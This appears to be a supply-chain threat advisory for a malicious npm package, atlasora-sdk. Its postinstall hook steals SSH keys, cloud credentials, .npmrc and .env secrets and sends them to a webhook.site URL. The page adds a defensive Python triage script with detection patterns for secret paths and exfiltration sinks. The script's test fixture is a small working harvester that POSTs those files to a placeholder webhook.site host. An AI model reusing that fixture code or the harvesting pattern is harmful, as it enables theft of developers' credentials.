Supply-chain threat intelligence

Incident detail

critical · npm · maintainer compromise · osv

Malicious code in atlasora-sdk (npm)

atlasora-sdk

Risk score

92

AI summary

Indexed incident for atlasora-sdk (npm).

Description

Package ships a postinstall hook (package.json scripts.postinstall: node install.js) that runs automatically on every npm install. install.js reads classic installer-secret paths — ~/.ssh/* (any file containing 'PRIVATE' or 'KEY'), ~/.aws/credentials, ~/.npmrc, and .env / .env.local / .env.production from the working directory — and bulk-scrapes 30+ environment variables shaped like credentials (PRIVATE_KEY, AWS_SECRET_ACCESS_KEY, JWT_SECRET, COINBASE_*, SUPABASE_SERVICE_ROLE_KEY, ANTHROPIC_*, etc.), plus host identity (os.hostname(), os.userInfo(), git config --list).

The collected bundle is POSTed as JSON over HTTPS to a hardcoded anonymous webhook.site collection URL stored in a variable literally named EXFIL_SERVER.

The package's index.js exports only a stub {version, name} — there is no real SDK functionality, despite the package name and description claiming to be the AtlasOra Web3 vacation-rental SDK. This is a brand-impersonation credential harvester targeting AtlasOra developers; any machine that runs npm install atlasora-sdk is fully compromised.
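A static triage check for the install-hook harvester pattern described above, added here as an example and not ThreatPkg's, OSV's or the advisory's own tooling. It reads a package.json for lifecycle hooks and scans the script they invoke for secret-file paths, credential-shaped process.env reads, host fingerprinting and an outbound sink; the package.json and install.js it scans are constructed stand-ins, not the real package's contents.

```python
import json
import re

# Traits taken from the behaviour described in the advisory above.
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
SECRET_PATHS = [r"\.ssh", r"\.aws/credentials", r"\.npmrc", r"['\"/]\.env\b"]
SECRET_ENV = re.compile(r"process\.env\.([A-Z0-9_]*(?:KEY|SECRET|TOKEN|PASSWORD)[A-Z0-9_]*)")
EXFIL_SINKS = [r"webhook\.site", r"https?\.request\(", r"\bfetch\(", r"EXFIL"]
HOST_IDENTITY = [r"os\.hostname\(", r"os\.userInfo\(", r"git config"]

def hook_scripts(package_json: str) -> dict:
    """Return {hook: command} for the scripts npm runs automatically on install."""
    scripts = json.loads(package_json).get("scripts", {})
    return {h: cmd for h, cmd in scripts.items() if h in LIFECYCLE}

def triage_install_script(src: str) -> dict:
    """Flag credential-harvester traits in a hook script's source."""
    f = {
        "secret_paths": [p for p in SECRET_PATHS if re.search(p, src)],
        "secret_env": sorted({m.group(1) for m in SECRET_ENV.finditer(src)}),
        "exfil_sinks": [p for p in EXFIL_SINKS if re.search(p, src)],
        "host_identity": [p for p in HOST_IDENTITY if re.search(p, src)],
    }
    # Reads secrets AND has an outbound sink: the harvester shape. Otherwise
    # the hook still warrants a human look, so it is never marked clean here.
    reads = bool(f["secret_paths"] or f["secret_env"])
    f["verdict"] = "credential-harvester" if reads and f["exfil_sinks"] else "review"
    return f

def triage_package(package_json: str, files: dict) -> dict:
    """Triage each lifecycle hook that invokes a file shipped in the package."""
    return {hook: triage_install_script(src)
            for hook, cmd in hook_scripts(package_json).items()
            for fname, src in files.items() if fname in cmd}

# Constructed fixture mirroring the advisory; NOT the real package's files.
SAMPLE_PACKAGE_JSON = '{"name": "example-sdk", "scripts": {"postinstall": "node install.js", "test": "jest"}}'
SAMPLE_INSTALL_JS = r"""
const fs = require('fs'), os = require('os'), https = require('https');
const EXFIL_SERVER = 'https://webhook.site/PLACEHOLDER-ID';
const loot = {host: os.hostname(), user: os.userInfo(),
  ssh: fs.readdirSync(os.homedir() + '/.ssh'),
  aws: fs.readFileSync(os.homedir() + '/.aws/credentials', 'utf8'),
  npmrc: fs.readFileSync(os.homedir() + '/.npmrc', 'utf8'),
  env: fs.readFileSync('.env', 'utf8'),
  k: [process.env.AWS_SECRET_ACCESS_KEY, process.env.JWT_SECRET]};
https.request(EXFIL_SERVER, {method: 'POST'}).end(JSON.stringify(loot));
"""
if __name__ == "__main__":
    print(json.dumps(triage_package(SAMPLE_PACKAGE_JSON, {"install.js": SAMPLE_INSTALL_JS}), indent=2))
```

Run it against an unpacked tarball by reading package.json and the hook's target file from disk; a "review" verdict on any lifecycle hook is itself worth a look, since most SDK packages need no install script at all.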

Technical details

Affected versions

=1.0.0

Indicators

  • affected version =1.0.0 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents